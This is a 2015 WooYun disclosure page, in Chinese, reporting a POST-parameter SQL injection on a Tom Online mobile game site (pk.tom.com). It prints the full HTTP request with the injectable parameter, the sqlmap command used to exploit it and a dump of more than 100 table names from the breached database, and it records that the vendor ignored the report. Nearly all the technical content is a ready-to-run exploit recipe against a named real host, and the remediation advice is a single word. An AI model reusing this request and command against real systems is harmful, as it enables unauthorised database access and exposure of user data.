Tom在线某站SQL注射涉及40w用户 | wooyun-2015-0118977| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118977

漏洞标题：Tom在线某站SQL注射涉及40w用户

漏洞作者：路人甲

提交时间：2015-06-09 10:29

修复时间：2015-06-14 10:30

公开时间：2015-06-14 10:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-09：细节已通知厂商并且等待厂商处理中
2015-06-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

tom自己说的40万啊

详细说明：

POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1
Host: pk.tom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=abc1jamRVmxlb9eZvF82u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
mobile_game_id=12777

sqlmap.py -r test.txt -p mobile_game_id --dbms mysql
post注入

Database: newwapdb
[228 tables]
+---------------------------------------+
| back_download_game_info               |
| bind_tom_139                          |
| download_count                        |
| filter_words                          |
| game_bulletin                         |
| game_clientinfo                       |
| game_cogameinfo                       |
| game_coinfo                           |
| game_goods                            |
| game_goods_type                       |
| game_mission                          |
| game_netbattle                        |
| game_netbattle_item                   |
| game_photo                            |
| game_single_record                    |
| game_stat_day                         |
| game_toolsinfo                        |
| game_uids                             |
| game_user                             |
| game_user_black                       |
| game_user_chat                        |
| game_user_friend                      |
| game_user_level                       |
| game_user_sign                        |
| game_user_sns                         |
| game_user_task                        |
| game_user_visitor                     |
| game_useraddressinfo                  |
| game_usergold                         |
| game_usergolddetail                   |
| game_usergoods                        |
| game_userinfo                         |
| game_usermdoupmsg                     |
| game_userpay_offerclient              |
| game_userpayrecord                    |
| game_userprize                        |
| game_userrandom                       |
| game_userrandom_bak                   |
| game_userrandom_new                   |
| game_userrechargerecord               |
| game_v2_netbattle                     |
| game_v2_netbattle_finalgoldinfo       |
| game_v3_bulletin                      |
| game_v3_friends                       |
| game_v3_linkmobile                    |
| game_v3_netbattle                     |
| game_v3_netbattle_finalgoldinfo       |
| game_v3_netbattle_item                |
| game_v3_pksparameter                  |
| game_v3_prizes                        |
| game_v3_sendsmsinfo                   |
| game_v3_single_record                 |
| game_v3_usergold                      |
| game_v3_usergolddetail                |
| game_v3_userinfo                      |
| game_v3_userprize                     |
| game_v4_adv_record                    |
| game_v4_bulletin                      |
| game_v4_bulletin_wap                  |
| game_v4_cmddisc_history               |
| game_v4_coupon_history                |
| game_v4_couponprize_info              |
| game_v4_fgrechargeprize_history       |
| game_v4_finalgold_rechargeinfo        |
| game_v4_friends                       |
| game_v4_gamedown_config               |
| game_v4_gametype_info                 |
| game_v4_linkmobile                    |
| game_v4_lucklydraw_history            |
| game_v4_manualprize                   |
| game_v4_manualprize_info              |
| game_v4_message                       |
| game_v4_message_bak20120420           |
| game_v4_message_bak20120501           |
| game_v4_message_bak20120604           |
| game_v4_message_location              |
| game_v4_message_location_bak20120420  |
| game_v4_message_location_bak20120501  |
| game_v4_message_location_bak20120604  |
| game_v4_message_location_new          |
| game_v4_message_new                   |
| game_v4_mobileuid_linkinfo            |
| game_v4_msgpush_info                  |
| game_v4_msgpush_type                  |
| game_v4_netbattle                     |
| game_v4_netbattle_bak20120420         |
| game_v4_netbattle_finalgoldinfo       |
| game_v4_netbattle_item                |
| game_v4_netbattle_item_bak20120420    |
| game_v4_onlinegame_info               |
| game_v4_onlinegame_itempayment        |
| game_v4_onlinegame_smscode            |
| game_v4_payment_platform_detail       |
| game_v4_pksparameter                  |
| game_v4_prizes                        |
| game_v4_robot_sendsmscount            |
| game_v4_robotinfo                     |
| game_v4_sendsmsinfo                   |
| game_v4_single_record                 |
| game_v4_thirdpart_cardinfo            |
| game_v4_thirdpart_partnerinfo         |
| game_v4_thirdpart_usercard            |
| game_v4_topboard                      |
| game_v4_user_freegold                 |
| game_v4_user_freegold_monthly         |
| game_v4_user_freegolddetail           |
| game_v4_user_prizeinfo                |
| game_v4_userbattle_summarizinfo       |
| game_v4_usercoupon_info               |
| game_v4_usergold                      |
| game_v4_usergolddetail                |
| game_v4_userinfo                      |
| game_v4_userinfo_extend               |
| game_v4_userlogin                     |

该有的表都有了

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-14 10:30

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-06-09 10:33 | Ch丶0nly ( 普通白帽子 | Rank:205 漏洞数:50 | 专注网络30年。)

楼主辛苦了乌云、360两头跑不累么？QTVA-2015-245636
2015-06-09 11:16 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

支持基友

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118977

漏洞标题：Tom在线某站SQL注射涉及40w用户

相关厂商：TOM在线

漏洞作者：路人甲

提交时间：2015-06-09 10:29

修复时间：2015-06-14 10:30

公开时间：2015-06-14 10:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118977

漏洞标题：Tom在线某站SQL注射涉及40w用户

相关厂商：TOM在线

漏洞作者： 路人甲

提交时间：2015-06-09 10:29

修复时间：2015-06-14 10:30

公开时间：2015-06-14 10:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0118977"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云